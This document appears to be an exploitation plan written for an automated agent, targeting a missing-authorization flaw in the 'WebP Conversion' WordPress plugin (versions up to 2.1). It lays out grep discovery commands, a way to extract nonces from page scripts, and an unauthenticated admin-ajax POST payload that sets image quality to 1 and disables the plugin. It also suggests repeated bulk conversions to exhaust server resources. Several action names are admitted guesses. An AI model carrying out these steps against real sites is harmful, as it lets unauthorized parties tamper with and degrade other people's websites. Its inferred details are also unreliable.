WebP Conversion <= 2.1 - Missing Authorization

This research plan focuses on identifying and exploiting a missing authorization vulnerability in the WebP Conversion plugin (versions <= 2.1).

1. Vulnerability Summary

The "WebP Conversion" plugin fails to implement proper authorization checks (e.g., current_user_can()) or CSRF protection (nonces) on its AJAX or administrative handlers. This allows unauthenticated attackers to trigger sensitive plugin actions, such as modifying settings or initiating image conversion processes, which can impact site integrity (I:L).

2. Attack Vector Analysis

• Endpoint: POST /wp-admin/admin-ajax.php or POST /wp-admin/admin-post.php.
• Target Actions: Likely webp_conversion_save_settings, webp_conversion_manual, or webp_conversion_bulk. (Exact action names to be verified).
• Payload: URL-encoded POST parameters representing plugin settings or conversion triggers.
• Authentication: Unauthenticated (PR:N).
• Preconditions: The plugin must be active.

3. Code Flow (Inferred)

1. Entry Point: The plugin registers AJAX handlers using add_action('wp_ajax_nopriv_...', ...) or hooks into admin_init / init to handle global POST requests.
2. Handler Execution: A function (e.g., webp_conversion_save_settings_callback) is executed.
3. Missing Check: The handler fails to call current_user_can('manage_options').
4. Action Execution: The code directly updates the database via update_option() or interacts with the filesystem without verifying the requester's identity.

4. Nonce Acquisition Strategy

If the plugin requires a nonce but exposes it to unauthenticated users via wp_localize_script:

1. Discovery: Search the codebase for wp_create_nonce.
   • Command: grep -r "wp_create_nonce" /var/www/html/wp-content/plugins/webp-conversion/
2. Localization Variable: Identify the JS object and key.
   • Example: wp_localize_script( 'webp-script', 'webp_obj', array( 'nonce' => wp_create_nonce('webp_nonce') ) );
3. Extraction:
   • Identify which shortcode or page triggers the script (e.g., the plugin's settings page or a public page where conversion is mentioned).
   • Use browser_navigate to a page where the script is enqueued.
   • Use browser_eval("window.webp_obj?.nonce") (inferred variable name) to extract the token.
4. Bypass: If the plugin lacks check_ajax_referer or wp_verify_nonce entirely, no nonce is needed.

5. Exploitation Strategy

Phase 1: Discovery

First, the agent must identify the exact AJAX actions:

1. Search for wp_ajax_nopriv_:
   grep -rn "wp_ajax_nopriv_" /var/www/html/wp-content/plugins/webp-conversion/
2. Search for functions that update options without capability checks:
   grep -rn "update_option" /var/www/html/wp-content/plugins/webp-conversion/ -B 10

Phase 2: Exploitation (Assuming webp_conversion_save_settings is vulnerable)

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Parameters:
  • action: webp_conversion_save_settings (inferred)
  • webp_quality: 1 (Setting quality to minimum to degrade site appearance)
  • webp_method: cwebp (inferred)
  • _wpnonce: (Only if found during discovery)

Example Payload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

action=webp_conversion_save_settings&webp_quality=1&webp_active=0

6. Test Data Setup

1. Install Plugin: Ensure webp-conversion v2.1 is installed and active.
2. Configuration: Configure the plugin with default settings (Quality: 80, Active: 1).
3. Content: Create at least one post with an image to verify if settings changes affect conversion behavior later.

7. Expected Results

• HTTP Response: 200 OK or a JSON success message (e.g., {"success":true}).
• Database State: The webp_conversion_quality (or similar) option in the wp_options table should be updated to the attacker-supplied value.
• Unauthorized Action: An unauthenticated user successfully modifies site-wide plugin configurations.

8. Verification Steps

After the exploit, verify via WP-CLI:

1. Check the relevant option:
   wp option get webp_conversion_quality (Verify it is now 1)
2. Check the status:
   wp option get webp_conversion_active (Verify if it was toggled)
3. Compare the current value with the initial value to confirm the change.

9. Alternative Approaches

• Admin-post.php: If no AJAX actions are found, check for admin_post_nopriv_ actions.
• Direct Hook: Check init or admin_init hooks that check for specific $_POST keys:
  grep -rn "add_action.*init" /var/www/html/wp-content/plugins/webp-conversion/ -A 5 | grep "_POST"
• Bulk Conversion: If setting manipulation is not possible, try to trigger the bulk conversion process repeatedly to cause resource exhaustion (Denial of Service/Integrity impact).
  • Action: webp_conversion_bulk_start (inferred).